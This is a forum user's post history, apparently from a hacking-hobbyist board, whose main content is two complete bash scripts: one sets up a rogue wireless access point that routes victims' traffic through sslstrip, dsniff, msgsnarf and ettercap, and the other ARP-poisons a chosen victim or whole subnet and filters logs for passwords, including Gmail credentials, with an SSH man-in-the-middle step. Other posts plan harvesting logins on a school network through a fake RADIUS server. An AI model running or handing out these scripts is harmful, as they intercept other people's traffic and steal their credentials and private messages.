-
Posts
25 -
Joined
-
Last visited
Junke1990's Achievements
Newbie (1/14)
-
VB used to stand for VisualBasic, possible years ago
- 15 replies
-
- screenlock
- lock
-
(and 1 more)
Tagged with:
-
You just made me feel old...xD
- 15 replies
-
- screenlock
- lock
-
(and 1 more)
Tagged with:
-
ow! I thought you were bullshitting me "i need to mount a VB to check? " mounting visual Basic? :P Thanks for the effort!
- 15 replies
-
- screenlock
- lock
-
(and 1 more)
Tagged with:
-
that doesn't answer my question, is it possible to detect it, yes or no, and if so, how?
- 15 replies
-
- screenlock
- lock
-
(and 1 more)
Tagged with:
-
My question is, is it possible to detect if a Windows (XP SP3+) Machine is locked. Regardless of the payload, I want to be able to automate more thus detect in code if it is locked. I could make 2 payloads, locked and unlocked but I would like to combine that into 1.
- 15 replies
-
- screenlock
- lock
-
(and 1 more)
Tagged with:
-
Windows, at least at first, do have Linux but no OSX in house
- 15 replies
-
- screenlock
- lock
-
(and 1 more)
Tagged with:
-
Is there an easy way to detect whether the screen is locked or not?
- 15 replies
-
- screenlock
- lock
-
(and 1 more)
Tagged with:
-
Thanks! Any tips/pointers I should look into while waiting on the post?
-
Where should the extensions go? There isn't anything about it in the https://bunnytoolkit.com/guides/ Git and docs https://github.com/hak5/bashbunny-payloads/tree/master/docs say in payload/library/extensions on the other hand the https://wiki.bashbunny.com/#!index.md guide says payload/extensions P.s. mine has been shipped about an hour ago so I can't test it out myself.
-
If you have any sugestions please let me know! #!/bin/bash # SoftAP for wireless-testing # Created/Modded by Junke1990 # # Hardware: Eee PC 1000h # NICs # eth0 (LAN) # ra0 (WLAN) rt2860STA # wlan1 (USB WLAN) RTL8170L # dealextreme sku.27963 # init sslstrip='/home/junke/Bureaublad/sslstrip-0.7/sslstrip.py' # services dsn=0 # Dsniff ims=0 # IMsniff msg=0 # MSGsnarf url=0 # URLsnarf ssllog1=0 # tail sslstrip.log ssllog2=0 # tail sslstrip.log |grep pass # Make sure only root can run our script if [[ $EUID -ne 0 ]]; then echo "This script must be run as root" 1>&2 exit 1 fi modprobe tun sleep 1 echo "[>] Starting: Soft AP - Junke1990" # get interface and mac list i=0 iflist=() maclist=() while read -r if mac; do iflist[i]=$if maclist[i]=$mac ((i++)) done < <(ifconfig -a | awk '/^[^ ]/ && $1 != "lo" {print $1,$5}') for i in "${!iflist[@]}"; do echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}" done echo -n "[?] Select your inet conn. [#] " read j intI=${iflist[j]} # select SoftAP adapter for i in "${!iflist[@]}"; do if [ $j != $i ]; then echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}" fi done echo -n "[?] Select your SoftAP adapter. [#] " read j intAP=${iflist[j]} # MAC address intAP_MAC=${maclist[j]} echo "[+] Gathering network info..." # info inet conn intI_IP=`ifconfig $intI | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'` intI_DNS=`cat /etc/resolv.conf | sed -n "2 p" | awk '{ print $2}'` intI_gw=`route -n | awk '{ print $2}' | grep -v '0.0.0.0' | sed -n "3 p"` intI_mask=`ifconfig $intI | grep 'Mask:' | grep -v '0.0.0.0' | awk '{ print $4}' | cut -d: -f2` intI_netw=`route -n | grep $intI_mask | cut -d' ' -f1 | head -n 1` # converting netmask in to netmask length echo "[+] Calc'ing network mask..." NETMASK=$intI_mask MASK1=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\1/'` MASK2=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\2/'` MASK3=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\3/'` MASK4=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\4/'` BM1=`echo -e "obase=2; ${MASK1}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m` BM2=`echo -e "obase=2; ${MASK2}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m` BM3=`echo -e "obase=2; ${MASK3}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m` BM4=`echo -e "obase=2; ${MASK4}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m` MASK=$(( BM1 + BM2 + BM3 + BM4)) intI_mask_nb=$MASK # enter wireless essid name echo -n "[?] Enter the desired name for wireless network: "; read ssid # prepare interface / softap #wlanconfig $intAP destroy #wlanconfig $intAP create wlanmode mon wlandev wifi0 if [ `echo $intAP || grep 'mon' ` ]; then intAP=`airmon-ng start $intAP |grep "monitor mode " | awk '{ print $5 }' |sed 's/)//'`; fi echo "[+] Setting up fake AP..."; sleep 1; # to enable wep add: -W 1 -w "1234567890" -a $intAP_MAC xterm -geometry 75x15 -e airbase-ng -c 6 -e "$ssid" $intAP & sleep 1; ifconfig at0 up ifconfig at0 192.168.3.1 netmask 255.255.255.0 ifconfig at0 mtu 1500 route add -net $intI_netw netmask $intI_mask gw $intI_gw route add -net 192.168.3.0 netmask 255.255.255.0 gw 192.168.3.1 # monitor #xterm -e airodump-ng -c 6 --bssid $intAP_MAC $intAP & #xterm -e tshark -i 3 "not broadcast and not multicast" & # at0 = 3 echo "[+] Killing dhcpd..." # do this quiet for when the process isn't running killall -q dhcpd3 echo "[+] Setting up DHCP config..." # create custom dhcpd.conf for WLAN DHCPDCONF=''; cat > dhcpd.conf << EOF ddns-update-style ad-hoc; default-lease-time 600; max-lease-time 7200; subnet 192.168.3.0 netmask 255.255.255.0 { option subnet-mask 255.255.255.0; option broadcast-address 192.168.3.255; option routers 192.168.3.1; EOF ### Submitted by ToomSec for d in $(cat /etc/resolv.conf | sed -r 's/^.* ([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}).*$/\1/' | grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}') do echo "option domain-name-servers $d;" >> dhcpd.conf done cat >> dhcpd.conf << EOF range 192.168.3.10 192.168.3.254; } EOF echo "[+] Cleaning up IP tables..." # iptables cleanup iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain echo "[+] Setting up forwarding tables..." # iptables #iptables -t nat -A PREROUTING -p udp -j DNAT --to $intI_gw # all udp traffic #iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $intI_DNS # DNS only iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 # send stuff to sslstrip iptables -A FORWARD --in-interface at0 -j ACCEPT # rogue gateway iptables -t nat -A POSTROUTING --out-interface $intI -j MASQUERADE # gateway to ext. router #iptables -t nat -A PREROUTING -s 192.168.3.0/24 -d $intI_netw/$intI_mask_nb -j DROP # protect LAN from WLAN # ip fwd enable echo 1 > /proc/sys/net/ipv4/ip_forward # start dhcp server for subnet # edit /etc/apparmor.d/usr.sbin.dhcp3 to allow dhcpd to read the config file if it keeps giving permission denied echo "[+] Setting up DHCP server..." xterm -geometry 75x10 -T DHCP -e dhcpd3 -d -f -cf dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 & ### python-twisted-web2 required!!! if [ -f $sslstrip ]; then echo "[+] Setting up sslstrip..." xterm -geometry 45x5 -e python $sslstrip -a -k -f -l 8080 & if [ $ssllog1 == 1 ]; then xterm -e tail -f sslstrip.log & fi if [ $ssllog2 == 1 ]; then xterm -e "tail -f sslstrip.log |grep 'pass' "& fi sleep 1 else echo "[-] SSLStrip not found..." echo 'Edit $sslstrip to the correct path.' fi # DSniff if [ $dsn == 1 ]; then if which dsniff >/dev/null; then echo "[+] Setting up dsniff..." xterm -e dsniff -i at0 -m & sleep 1 fi fi # IMSniff - MSN only if [ $ims == 1 ]; then if which imsniff >/dev/null; then echo "[+] Setting up IMSniff..." if [ ! -d 'IMlog' ]; then mkdir IMlog fi # gives a lot of unknown content err's xterm -e "imsniff -cd IMlog at0 |grep -i -v 'unknown'"& sleep 1 fi fi # MSGSnarf - AOL, ICQ, IRC, MSN, Yahoo if [ $msg == 1 ]; then if which msgsnarf >/dev/null; then echo "[+] Setting up MSGsnarf..." xterm -e msgsnarf -i at0 & sleep 1 fi fi # URLSnarf if [ $url == 1 ]; then if which urlsnarf >/dev/null; then echo "[+] Setting up URLsnarf..." xterm -e urlsnarf -i at0 & sleep 1 fi fi # ettercap TCP Ports # IMAP - 143/TCP 220/TCP (IMAP3) 993/TCP (IMAPS) # POP3 - 110/TCP 995/TCP # SMTP - 25/TCP 465/TCP # SSL - 443/TCP # HTTP - 80/TCP # SSH - 22/TCP # MSN - 1863/TCP # Yahoo - 5050/TCP - nobody interesting uses yahoo... # ICQ - 5190/TCP - nobody at all uses ICQ xD echo "[+] Setting up ettercap..." #xterm -e ettercap -T -i at0 -P autoadd -l ettercap -w ettercap.pcap -M arp /192.168.3.1/ /192.168.3.10-254/22,25,80,110,143,220,443,465,993,995,1863 & ### Submitted by ToomSec #ettercap -T -q -p -u -z -m ${LOGFOLDER}ettercap_evilap.log -i $wint >> $LOGFILE 2>&1 xterm -e ettercap -T -q -p -u -z -m ettercap_evilap.log -i at0 & sleep 1 # ip_forward # as last to avoid reset echo "[+] Enabling IP forward..." echo "1" > /proc/sys/net/ipv4/ip_forward chk=`cat /proc/sys/net/ipv4/ip_forward` if [ $chk != "1" ]; then echo "[-] Can NOT enable ip_forward..." fi echo "[x] All done! have fun!"
-
I honestly don't know, I'm not that big of an expert when it comes to ettercap. I did update the script to make it easier. But it is still a work in progress. I have a Soft AP script to if you want I can put it up here to, it is based on this one but has a few other feature since you are actually in the middle of the traffic.
-
Hey guys, Since I was getting tired of doing everything by hand I made a little script to automate the procedure xD Let me know if something is done wrong or you have suggestions! #!/bin/bash # ARP Poisoning # Created by Junke1990 # Tested with Asus eee 1000h # ### required packages ### # sudo apt-get -y install ettercap python-twisted-web2 dsniff imsniff python # sslstrip - google, download, extract and alter path below! # init sslstrip='/home/junke/Bureaublad/sslstrip-0.7/sslstrip.py' logfolder='ARP-logs/' # Make sure only root can run our script if [[ $EUID -ne 0 ]]; then echo "This script must be run as root" 1>&2 exit 1 fi modprobe tun sleep 1 # get interface and mac list i=0 iflist=() maclist=() while read -r if mac; do iflist[i]=$if maclist[i]=$mac ((i++)) done < <(ifconfig -a | awk '/^[^ ]/ && $1 != "lo" {print $1,$5}') for i in "${!iflist[@]}"; do echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}" done echo -n "Select your interface to ARP poison. [#] " read j int=${iflist[j]} echo -n "IP address of victim: [x.x.x.x]/[a]" read vic # info inet conn int_IP=`ifconfig $int | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'` int_gw=`route -n | awk '{ print $2}' |grep -v '0.0.0.0' | sed -n "3 p"` int_bc=`ifconfig $int | grep 'Bcast:'|cut -d: -f3 | awk '{ print $1}'` # lowest IP oct4=`echo ${int_gw} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\4/'` oct4=$((oct4+1)) int_a=`echo $int_gw | cut -d. -f1,2,3` int_a="$int_a.$oct4" # highest IP oct4=`echo $int_bc | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\4/'` int_b=$((oct4-1)) # range int_range="$int_a-$int_b" # determine victim if [ $vic = "a" ]; then vic=$int_range; fi # iptables iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 # ettercap TCP Ports # IMAP - 143/TCP 220/TCP (IMAP3) 993/TCP (IMAPS) # POP3 - 110/TCP 995/TCP # SMTP - 25/TCP 465/TCP # SSL - 443/TCP # HTTP - 80/TCP # SSH - 22/TCP # MSN - 1863/TCP # Yahoo - 5050/TCP - nobody interesting uses yahoo... # ICQ - 5190/TCP - nobody at all uses ICQ xD xterm -e ettercap -T -P autoadd -i $int -L ettercap.log -m ettercap.msg.log -l ettercap.info.log -w ettercap.pcap -M arp /$int_gw/ /$vic/22,25,80,110,143,220,443,465,993,995 & ### python-twisted-web2 required!!! if [ -f $sslstrip ]; then xterm -title sslstrip -e python $sslstrip -s -f -k -l 8080 & sleep 1 xterm -e tail -f "sslstrip.log" & sleep 1 xterm -e "tail -f sslstrip.log |grep -i 'pass' "& # filters - not fully tested! # xterm -title HYVES -e "tail -f sslstrip.log |grep 'auth_username' | sed 's/.*auth_username=/user=/' | sed 's/\&/ /g' | awk '{print $1 $2}'"& # xterm -title GMAIL -e "tail -f sslstrip.log |grep Passwd | sed 's/.*Email=/Email=/' | sed 's/\&/ /g' | awk '{print $1 $2 }'"& else echo "sslstrip not found." echo 'Edit $sslstrip to the correct path.' fi # DSniff if which dsniff >/dev/null; then xterm -e dsniff -i $int -m -w dsniff.log & fi # IMSniff - MSN only if which imsniff >/dev/null; then if [ ! -d 'IMlog' ]; then mkdir IMlog fi # gives a lot of unknown content err's xterm -e "imsniff -cd IMlog $int |grep -i -v 'unknown'"& fi # MSGSnarf - AOL, ICQ, IRC, MSN, Yahoo if which msgsnarf >/dev/null; then xterm -e msgsnarf -i $int & fi ### SINGLE VICTIM ONLY ### # SSH mitm if which sshmitm >/dev/null; then if [ $vic != "a" ]; then xterm -e sshmitm -I $vic & fi fi # ip_forward # as last to avoid reset echo "1" > /proc/sys/net/ipv4/ip_forward chk=`cat /proc/sys/net/ipv4/ip_forward` if [ $chk != "1" ]; then echo "Can't enable ip_forward" fi edit: updated the script
-
From where are you trying to connect to your WAN IP? I know that when I connect to my WAN IP from inside the network the traffic isn't forwarded but the router thinks it's for himself.
-
Hey guys, I wanted to see if I could MiTM at my school, but again and again it was unsuccessful. By simply asking the guys of IT department I now know they use a radius server with AD, but worse, DHCP snooping. So therefor I can not use the ARP poisoning or DHCP exhaustion. Best part, I've got permission to screw around with the network as much as I want since """I was such a great student thinking along with them to "solve" the security issues""" So I was thinking about setting up a Soft AP with NAT and my own Radius Server which accepts every login and logs those and with a second interface to connect to the actual network and passing the information, stripped, through. I've ordered a nice wireless card online to make sure my signal is better, http://www.dealextreme.com/details.dx/sku.27963 Any idea's or thoughts?
-
If an external adapter is an option. I'm the owner of an EEE 1000h, not suited for VM's but besides that, I was looking for an external WLAN adapter with a lot of power and it must be cheap. Check this one out http://www.dealextreme.com/details.dx/sku.27963 It's based on a RTL8187L chipset, I don't have it, still on it's way but the reviews of other people are well promising. Here's a nice review of the product: http://www.dealextreme.com/forums/Default....threadid.537069